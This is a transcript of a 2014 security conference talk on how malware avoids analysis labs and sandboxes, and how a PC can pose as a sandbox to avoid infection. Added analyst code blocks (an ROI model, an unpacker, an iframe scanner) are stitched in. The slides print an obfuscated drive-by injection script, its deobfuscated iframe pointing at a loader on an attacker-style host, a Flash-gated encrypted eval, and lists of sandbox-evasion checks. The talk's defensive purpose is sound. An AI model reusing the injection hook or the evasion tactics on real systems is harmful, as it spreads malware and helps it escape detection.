Thinking Outside the Sand[box]


Description: Kyle Adams - Chief Software Architect for Junos Web App Secure - presents at San Francisco's BSides 2014

Transcript of Thinking Outside the Sand[box]

Page 1: Thinking Outside the Sand[box]

Thinking Outside

the[Sand]box

Kyle Adams - Juniper Networks

This presentation is for educational purposes only

Page 2: Thinking Outside the Sand[box]

Introduction

Chief Software Architect for Junos Web App Secure

“Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly”

More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.

Page 3: Thinking Outside the Sand[box]

Primary Goal

Inoculate your machine from infection by specific classes of malware

Page 4: Thinking Outside the Sand[box]

Background

• Malware Analysis Background
  o Malware Collection Techniques
  o Malware Analysis Techniques
  o Signature Development

• Malware Authoring ROI
  o Malware ROI
  o Optimizing for Success
  o Hypothetical Example

• Evasion
  o Distribution Evasion
  o Sandbox Evasion

Page 5: Thinking Outside the Sand[box]

Background / Malware Collection

How do analysts get malware samples?

• Web Crawlers

• Torrents

• Usenet

• Malware Repositories

• Email

• Droppers

Page 6: Thinking Outside the Sand[box]

Background / Malware Analysis

How do malware analysts inspect malware?

• Static File Analysis

• Virtual Machine Sandboxing

• Code Emulation Sandboxing

Page 7: Thinking Outside the Sand[box]

Background / Signatures

How do malware signatures get created?

1. Get a sample

2. Analyze it for unique behaviors
   - Generate a heuristic behavior signature

3. Analyze it for unique data patterns
   - Generate a file data signature

4. Distribute new signatures to customers

5. Remove old unnecessary signatures

Page 8: Thinking Outside the Sand[box]

Background / Malware ROI

Lifecycle diagram: Research → Development → Testing → Distribution → Grow Infection Base

Uninterrupted Lifecycle:

The infection base grows indefinitely. The more machines infected, the

more return the attacker gets for their initial investment.

In other words… Time = Money

Page 9: Thinking Outside the Sand[box]

Background / Malware ROI

Lifecycle diagram: Research → Development → Testing → Distribution → Grow Infection Base

Interrupted Lifecycle: Sample Collected → Sample Detected → Signature Published

The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment.

So… Time to DETECTION = Money

Page 10: Thinking Outside the Sand[box]

Background / Optimizing For Success

Hypothetical Example:

Bob spends 20 hours researching his target environment, and another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour.

Bob’s ransom is $300 and 10% of his victims will choose to pay.

So for every hour Bob’s malware is undetected, he makes:

((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour

Assume the infection rate remains constant for 72 hours; minus Bob’s time (at ~$50 an hour), Bob makes a total of $422,800.

Page 11: Thinking Outside the Sand[box]

Background / Optimizing For Success

Hypothetical Example:

Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour.

(hours_before_detection * (((200 clients * .1) * $300) - (200 clients * $0.50)))
+ (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)))

Detection at 6 hours: Bob makes $52,870

Detection at 12 hours: Bob makes $88,500

Detection at 18 hours: Bob makes $120,130

Detection at 24 hours: Bob makes $153,760

So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770.

That’s a lot of motivation!
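The two-rate model on these slides, carried through as a runnable function of time-to-detection. This is an added example, not material from the deck; every parameter is the slide's own figure (200 infections per hour, 10 after detection, 10% pay rate, $300 ransom, $0.50 per infection, 72-hour campaign, 40 hours of Bob's time at $50), and the sweep is the defender's view of what each hour of faster detection removes from the attacker's return.

```javascript
// Added example (not from the slides): the deck's ransomware ROI model as a
// function of time-to-detection. Runs under Node.js with no dependencies.
const SLIDE_PARAMS = {
  infectionsPerHour: 200,      // distribution rate before a signature exists
  infectionsPerHourAfter: 10,  // distribution rate once a signature is published
  payRate: 0.1,                // fraction of victims who pay
  ransom: 300,                 // USD per paying victim
  costPerInfection: 0.5,       // USD paid to the distributor per infection
  campaignHours: 72,
  laborHours: 40,              // 20h research + 20h development and testing
  hourlyRate: 50,              // value of Bob's own time
};

// Net revenue for one hour at a given infection rate:
// (infections * payRate * ransom) - (infections * costPerInfection)
function hourlyNet(infections, p) {
  return infections * p.payRate * p.ransom - infections * p.costPerInfection;
}

// Total campaign profit when a signature lands after `hoursBeforeDetection`.
// Hours before detection earn the full rate, the remainder earn the reduced rate,
// and Bob's own time is subtracted once.
function profitWithDetection(hoursBeforeDetection, p = SLIDE_PARAMS) {
  const before = Math.min(Math.max(hoursBeforeDetection, 0), p.campaignHours);
  const after = p.campaignHours - before;
  const revenue =
    before * hourlyNet(p.infectionsPerHour, p) +
    after * hourlyNet(p.infectionsPerHourAfter, p);
  return revenue - p.laborHours * p.hourlyRate;
}

// Profit for a sweep of detection times: the attacker's return as a function of
// how long the defender takes to get a signature out.
function detectionSweep(hours = [6, 12, 18, 24], p = SLIDE_PARAMS) {
  return hours.map((h) => ({ detectedAtHour: h, profit: profitWithDetection(h, p) }));
}

console.log(hourlyNet(SLIDE_PARAMS.infectionsPerHour, SLIDE_PARAMS)); // 5900
console.log(profitWithDetection(72)); // never detected: 422800
console.log(detectionSweep());
```

Changing `infectionsPerHourAfter` or `campaignHours` shows how sensitive the return is to the post-signature rate, which is the lever a faster detection pipeline actually moves.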

Page 12: Thinking Outside the Sand[box]

Background / Distribution Evasion

• You can’t analyze something you can’t get.

• You can’t generate signatures if you can’t analyze.

So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution.

Distribution Evasion

Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.

Page 13: Thinking Outside the Sand[box]

Background / Distribution Evasion

Distribution Evasion Tactics:

• Don’t serve to search engines (Google, Yahoo, Bing, etc…)

• Don’t serve to known security lab IPs (Symantec, McAfee, etc…)

• Don’t serve to an environment you can’t infect (Missing Plugins,

Unsupported OS, etc…)

• Randomly choose not to serve

• Serve only to specific countries/IP ranges

• Serve only to known browsers

• Serve only if referer is whitelisted

• Serve only once per IP

Page 14: Thinking Outside the Sand[box]

Background / Distribution Evasion

Distribution Evasion Implementation:

1. Inject an obfuscated drive-by download hook into compromised sites:

<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e=\\"1\\" d=\\"1\\"c=\\""+2+"\\"></3>");</0>',17,17,
'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|'),0,{}))
</script>

Deobfuscated, it looks like this:

<script type="text/javascript">
var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";
document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste + "\"></iframe>");
</script>

But this does nothing to stop automated crawlers in a research lab.
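Two analyst-side helpers for the hook above, added here as an example and not taken from the slides or from Juniper. The first statically unpacks the "p,a,c,k,e,d" packer output by rebuilding the same token dictionary the bootstrap builds, so the payload is recovered without evaluating it; it is fed the slide's own payload and word list. The second scans page HTML for the shape the deobfuscated hook writes: an iframe a pixel or two in size, or hidden by inline style. The sample page it scans is constructed, and its hostnames are placeholders.

```javascript
// Added example (not from the slides): analyst-side helpers for the drive-by
// hook above. Runs under Node.js with no dependencies.

// 1. Static unpacker for "eval(function(p,a,c,k,e,d){...})" packer output.
//    The packed bootstrap builds a token -> word dictionary from its word list
//    and substitutes it into the payload string; this performs the same
//    substitution without ever evaluating the result.
function unpackPacked(p, a, c, k) {
  const dict = Object.create(null);
  for (let i = 0; i < c; i++) {
    const token = i.toString(a);   // token names are numbers written in base `a`
    dict[token] = k[i] || token;   // an empty word-list slot means the token stands for itself
  }
  // Tokens missing from the dictionary are left untouched (the packer itself
  // would substitute "undefined", which is never what the analyst wants).
  return p.replace(/\b\w+\b/g, (w) => (w in dict ? dict[w] : w));
}

// Payload, radix, count and word list copied from the slide's hook.
const PACKED_PAYLOAD = '<0 8="7/a">6 2="4://5.9.f";b.g("<3 e=\\"1\\" d=\\"1\\"c=\\""+2+"\\"></3>");</0>';
const PACKED_WORDS = 'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|');

function unpackSlideHook() {
  return unpackPacked(PACKED_PAYLOAD, 17, 17, PACKED_WORDS);
}

// 2. Hidden-iframe finder: flags <iframe> tags that are at most two pixels in
//    either dimension, or hidden by inline style.
function findHiddenIframes(html) {
  const hits = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /\b(width|height|src|style)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let attr;
    while ((attr = attrRe.exec(tag[1])) !== null) {
      attrs[attr[1].toLowerCase()] =
        attr[2] !== undefined ? attr[2] : attr[3] !== undefined ? attr[3] : attr[4];
    }
    const width = parseInt(attrs.width, 10);
    const height = parseInt(attrs.height, 10);
    const tiny = (!Number.isNaN(width) && width <= 2) || (!Number.isNaN(height) && height <= 2);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '');
    if (tiny || hidden) {
      hits.push({ src: attrs.src || '', width, height, tiny, hidden });
    }
  }
  return hits;
}

// Constructed sample page (not from the slides): one normal video embed, one
// 1x1 injected iframe and one CSS-hidden iframe. Hostnames are placeholders.
const SAMPLE_PAGE = [
  '<html><body>',
  '<iframe width="640" height="360" src="https://video.example/embed/123"></iframe>',
  '<iframe width="1" height="1" src="http://loader.example.invalid/loader.php?key=PLACEHOLDER"></iframe>',
  "<iframe style='display:none' src='http://hidden.example.invalid/'></iframe>",
  '</body></html>',
].join('\n');

function scanSamplePage() {
  return findHiddenIframes(SAMPLE_PAGE);
}

console.log(unpackSlideHook());
console.log(scanSamplePage());
```

Unpacking the slide's payload shows the packed sample actually points `ste` at www.google.com; the deck's "deobfuscated" version substitutes a more realistic loader URL for illustration. The iframe scanner is deliberately a regex pass over raw HTML rather than a DOM walk, so it can run in a crawler or proxy on the response body before anything is rendered.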

Page 15: Thinking Outside the Sand[box]

Background / Distribution Evasion

Distribution Evasion Implementation:

2. Add client-side specificity: The malware requires a specific version of Flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of Flash.

<script type="text/javascript">
… encryption/decryption code …
eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b4718585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c4042584451191b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b17141e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version));
</script>

Now if the lab isn’t using Flash version 12.0.0.44, the drive-by iframe will not be injected.

Page 16: Thinking Outside the Sand[box]

Background / Distribution Evasion

Distribution Evasion Implementation:

3. Add server-side specificity and filtering: The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met:

• You’re not a search engine

• Your IP is not blacklisted, or is in a whitelist

• You’re using an exploitable OS and browser

• This is the first time you have loaded the iframe

• Drive-by code has been injected into the domain of your referer

Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.

Page 17: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload:

• Significant Clock Skew

• Debugger is attached

• Virtual Machine Detected

• No Internet Connection

• Unexploitable environment

• Sandbox Software Detected

• Sleep statements abort prematurely

Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer:

• Long sleep before payload execution

• Schedule payload execution for some time in the future

• Require a system reboot, or several reboots

Page 18: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Sandbox evasion techniques can be grouped

into several high level categories:

• Specificity

• Triggers

• Detection

• Interruption

• Dialogs

Any given malware sample may do zero or more of these.

Page 19: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Specificity:

• Has internet connection

• Has correct software versions

• Has correct OS

• Has expected security policies

• Public IP is in correct geographical region

• Clock skew is minimal

• Account data is present (Gmail, AIM, Facebook, etc…)

Page 20: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Specificity:

Screenshot captions: Requires an email handling app like Outlook or Thunderbird. Requires .NET Framework. Requires Internet connection. Requires Win 95/98.

Page 21: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Triggers:

• Sleep for several minutes

• Require multiple executions

• Wait for one or more reboots

• Wait for event

o User opens .txt file

o User launches browser

o User switches to battery power

o User updates windows

o User installs software

o User connects to WiFi

o HID activity (Mouse, Keyboard, Webcam, Mic)

Page 22: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Triggers:

Screenshot captions: Requires browser restart to trigger payload. Requires a second execution.

Page 23: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Detection:

• Debugger Hooks

• Virtual Machines

o Registry Keys, Serial Numbers, MAC addresses

o Processes, Services, Drivers, Open Ports

o VM Specific ASM instructions

• Sandbox Software

o Open Ports, Processes, Files

Page 24: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Detection:

Screenshot captions:

Themida: legitimate software piracy protection wrapper designed to detect VMs and debuggers. Go figure, malware authors use it too.

Debugger detection. And hey, they even explained how to turn off SoftICE (just in case you didn’t know how).

No printer?

Page 25: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Interruption:

• Analysis Framework Interruption:

o Force Reboot or Logout

o Enable Firewall / Whitelist C&C servers

• Screen Capture Interruption

o Open dialogs minimized

o Open other apps Maximized

o Flashing components / Animation

o Hidden MouseOver components

Page 26: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Interruption:

Screenshot captions:

Force a reboot.

Screen shot evasion: the “Play” button flashes. We got lucky and took the screenshot at the right time.

Page 27: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Dialogs:

Page 28: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Simple Dialogs:

• What are they?
  o Fake Apps
  o Fake Installers
  o Fake Errors

• Why?
  o Prevent sandbox analysis
  o Phish for information
  o Legitimize
    - it looks real, so it’s probably safe
    - red flags (UAC, firewall notices, etc…)

Page 29: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Simple Dialogs:

Screenshot captions: Legitimize UAC dialogs. Require basic human input (click a button).

Page 30: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Advanced Dialogs:

• Require account details

• TOS acceptance

• Combination Lock

• Graphic based dialogs

Page 31: Thinking Outside the Sand[box]

Background / Sandbox Evasion

Advanced Dialogs:

Screenshot captions:

Requires password, presumably available with the download link.

Fake dialog: this dialog looks similar to the default theme of XP, but is clearly not.

Captcha-style dialog.

Page 32: Thinking Outside the Sand[box]

Deceptive Inoculation

Bottom line, malware takes great care not to run in a sandbox environment.

Let’s all be sandboxes! (or at least pretend to be)

Page 33: Thinking Outside the Sand[box]

Deceptive Inoculation

• Distribution Deception
  o Prevent your personal computer from being sent malware in the first place (stop drive-by downloads).

• Sandbox Deception
  o Prevent malware from executing a payload when launched on your personal computer.

Page 34: Thinking Outside the Sand[box]

Inoculation / Distribution Evasion

Pretend you’re Googlebot:

1. Firefox: Install User-Agent-Switcher

2. Set User-Agent to: Googlebot-Image (Googlebot)

Pretend none of your plugins are enabled:

1. Firefox: Go to Tools > Add-ons

2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)

Disable Referers:

1. Firefox: Go to about:config

2. Set “network.http.sendRefererHeader” to 0

Page 35: Thinking Outside the Sand[box]

Inoculation / Distribution Evasion

Request Suspicious Content Twice:

This doesn’t exist yet, but what if….

Diagram (an IFRAME VALIDATOR sitting between the browser and the servers):

  iframe: badsite.com → Bad Server → embedded flash

  repeat: badsite.com → Bad Server → no embedded flash

  iframe: goodsite.com → Good Server → no embedded flash

Page 36: Thinking Outside the Sand[box]

Inoculation / Sandbox Evasion

Permanent Debugger

1. Install a debugger

2. Hook every process automatically

Spoof VMWare Artifacts:

1. Create stub exe called “VBoxService.exe” and leave it running on boot.

Skew your clock

1. Change system time to be 1 year behind

2. Disable clock syncing

Page 37: Thinking Outside the Sand[box]

Inoculation / Sandbox Evasion

Sandbox Emulation

1. Open ports (cuckoo: 2042, mongodb: 27017)

2. Configure as Cuckoo Guest:

http://docs.cuckoosandbox.org/en/latest/installation/guest/ But make sure to

cripple the agent!

These changes may result in instability to the system, and would require some additional testing in a well used desktop environment.

1. Add a dll named “dbghelp.dll” to registry so it loads into every process

2. Temporarily Assign windows product ID of “76487-337-8429955-22614”

(Assign on boot, revert on shutdown)

Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The more artifacts you can create for these sandboxes, the better the results.

Page 38: Thinking Outside the Sand[box]

Conclusion

Practicality:

As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly.

Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.

Page 39: Thinking Outside the Sand[box]

Conclusion

Perceived Efficacy:

With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed.

True Efficacy:

Hard to say how effective it really is, because the samples this works on are less likely to be identified as known malware.

Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.

Page 40: Thinking Outside the Sand[box]

More Information

Contact Info: Email: [email protected]

Twitter: kadams_sec

LinkedIn: https://www.linkedin.com/in/adamsk

Presentation Material: http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow

References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-aware-malware.html